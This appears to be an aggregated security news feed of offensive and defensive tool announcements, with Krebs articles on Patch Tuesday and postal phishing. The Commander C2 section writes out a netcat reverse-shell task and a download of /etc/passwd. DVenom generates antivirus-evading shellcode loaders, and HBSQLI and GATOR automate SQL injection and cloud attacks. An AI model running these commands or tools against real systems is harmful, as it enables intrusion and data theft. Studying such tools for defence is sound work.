The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.


Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan

☐ ☆ ✇ KitPloit - PenTest Tools!

Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

By: Zion3R — November 7th 2023 at 11:30

Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

  • Capable of bypassing some well-known antivirus (AVs).
  • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
  • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
  • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

  • Golang installed.
  • Basic understanding of shellcode operations.
  • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

To clone and run this application, you'll need Git installed on your computer. From your command line:

# Clone this repository
$ git clone
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/

After installation, you can run the tool using the following command:

./dvenom -h

  • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
  • -key: Provide the encryption key.
  • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
  • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
  • -procname: Provide the process name to be injected (default is "explorer").
  • -scfile: Provide the path to the shellcode file.

To generate c# source code that contains encrypted shellcode.

Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

Language Supported Methods Supported Encryption
C# valloc, pinject, hollow, ntinject xor, rot, aes256, rc4
Rust pinject, hollow, ntinject xor, rot, rc4
PowerShell valloc, pinject xor, rot
ASPX valloc xor, rot
VBA valloc xor, rot

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

This project is licensed under the MIT License - see the LICENSE file for details.

Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.

☐ ☆ ✇ KitPloit - PenTest Tools!

WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R — November 6th 2023 at 11:30

A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.

WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.


pip install WebSecProbe

WebSecProbe <URL> <Path>


WebSecProbe admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = '' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)

☐ ☆ ✇ – The Hackers Arsenal Tools Portal

ToolsWatch introducing Armory at Gisec 2024 in Dubai: A New Arena for Cybersecurity Open Source Tools Announced

By: NJ Ouchn — November 3rd 2023 at 17:52
In the world of cybersecurity, the need for innovation and collaboration has never been more
☐ ☆ ✇ KitPloit - PenTest Tools!

TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R — November 2nd 2023 at 11:30

TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 --help

Packet Sniffer Tool

-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!" 

☐ ☆ ✇ KitPloit - PenTest Tools!

GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R — October 23rd 2023 at 17:45

GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances


Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via

git clone
python install

Automated Installation via pip

pip install gator-red


Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!


Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.


I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)

☐ ☆ ✇ The Hacker News

Who's Experimenting with AI Tools in Your Organization?

By: The Hacker News — October 23rd 2023 at 11:34
With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee.  From a productivity perspective, that’s fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in
☐ ☆ ✇ KitPloit - PenTest Tools!

SecuSphere - Efficient DevSecOps

By: Zion3R — October 21st 2023 at 11:30

SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.

Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone


Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.


We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.

☐ ☆ ✇ KitPloit - PenTest Tools!

Commander - A Command And Control (C2) Server

By: Zion3R — October 20th 2023 at 21:31

Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API


  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems


Python >= 3.6 is required to run and the following dependencies

Linux for the and (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the module first in order to create a local sqlite db file


Continue by running the server


And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent

# C agent
gcc agent.c -o agent -lcurl -lb64

By default both the Agents and the server are running over TLS and base64. The communication point is set to and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents


task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

Bye Bye!


sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.


Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the first and then the and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.


The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/

You can run it like this:


# and to run the agent, do as usual

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file


pytest was used for the testing. You can run the tests like this:

cd tests/

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.

☐ ☆ ✇ The Hacker News

The Fast Evolution of SaaS Security from 2020 to 2024 (Told Through Video)

By: The Hacker News — October 16th 2023 at 11:46
SaaS Security’s roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. “SaaS Security on Tap” is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (
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JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R — October 15th 2023 at 11:30

JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Before installing JSpector, you need to have Jython installed on Burp Suite.


  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to the
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.


  • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:

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HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R — October 15th 2023 at 00:31

HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications. 


This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.


Install HBSQLI with following steps:

$ git clone
$ pip3 install -r requirements.txt


usage: [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 -u "" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 -l urls.txt -p payloads.txt -H headers.txt -v


There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command


  • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or even some more custom header in that file itself according to your need.


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Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R — October 11th 2023 at 18:26

Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter



Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

./ -d [DOMAIN] -o [stdout or xls]
./ -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt


(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here


The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.


This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.


Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.

☐ ☆ ✇ Krebs on Security

Patch Tuesday, October 2023 Edition

By: BrianKrebs — October 10th 2023 at 22:51

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and Wordpad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778,  a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

☐ ☆ ✇ Krebs on Security

Phishers Spoof USPS, 12 Other Natl’ Postal Services

By: BrianKrebs — October 9th 2023 at 20:39

The fake USPS phishing page.

Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.

KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader’s address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.

The landing page generated by the phishing link includes the USPS logo, and says “Your package is on hold for an invalid recipient address. Fill in the correct address info by the link.” Below that message is a “Click update” button that takes the visitor to a page that asks for more information.

The remaining buttons on the phishing page all link to the real website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.

This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage’s code and operations.

Check out the bottom portion of the screenshot below, and you’ll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.

Click the image to enlarge.

A search on this domain at the always-useful shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):


As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code — UA-80133954-3 — which apparently was rejected for pointing to an invalid domain.

Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. Click to enlarge. That code actually belongs to the USPS.

The valid domain for that Google Analytics code is the official website. According to, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which says was registered way back in September 2018 to an individual in Nigeria.

A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which shows was running a similar set of phishing pages targeting USPS users. indicates this website name was registered by phishers based in Indonesia.

DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based, but the registrant city and state listed for that domain says “Georgia, AL,” which is not a real location.

Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in “.top.” These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.

Those other nations include the Australia Post, An Post (Ireland), (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).

A phishing page targeting An Post, the state-owned provider of postal services in Ireland.

The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.

An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.

